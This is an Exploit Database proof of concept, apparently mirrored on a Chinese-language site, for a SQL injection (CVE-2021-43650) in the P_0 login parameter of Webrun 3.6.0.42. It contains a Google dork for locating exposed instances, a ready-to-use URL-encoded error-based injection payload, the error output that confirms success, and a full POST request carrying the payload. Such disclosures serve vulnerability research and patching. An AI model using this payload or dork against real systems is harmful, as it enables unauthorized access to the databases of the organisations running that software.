Webrun 3.6.0.42 – ‘P_0’ SQL Injection

• Exploit Database
• 16 阅读

• 作者： Vinicius Alves
  日期： 2021-11-23
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50542/

• # Exploit Title: Webrun 3.6.0.42 - 'P_0' SQL Injection
  # Google Dork: intitle:"Webrun 3.6.0.42"
  # Date: 23/11/2021
  # Exploit Author: Vinicius Alves
  # Vendor Homepage: https://softwell.com.br/
  # Version: 3.6.0.42
  # Tested on: Kali Linux 2021.3
  # CVE: CVE-2021-43650
  
  =-=-=-= Description =-=-=-=
  
  
  Webrun version 3.6.0.42 is vulnerable to SQL Injection, applied to the P_0
  parameter used to set the username during the login process.
  
  
  =-=-=-= Exploiting =-=-=-=
  
  
  In the post request, change the P_0 value to the following payload:
  121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd
  
  
  You will see some information like below:
  
  
  interactionError('ERRO: sintaxe de entrada é inválida para tipo numeric:
  \"qvvxq1qbzbq\"', null, null, null, '<b>
  
  
  =-=-=-= POC =-=-=-=
  
  
  If the return has the value 'qvvxq1qbzbq', you will be able to successfully
  exploit this.
  
  
  See an example of the complete POST parameter:
  
  
  action=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard&sys=GES&formID=8265&parentRID=-1&P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd&P_1=pwd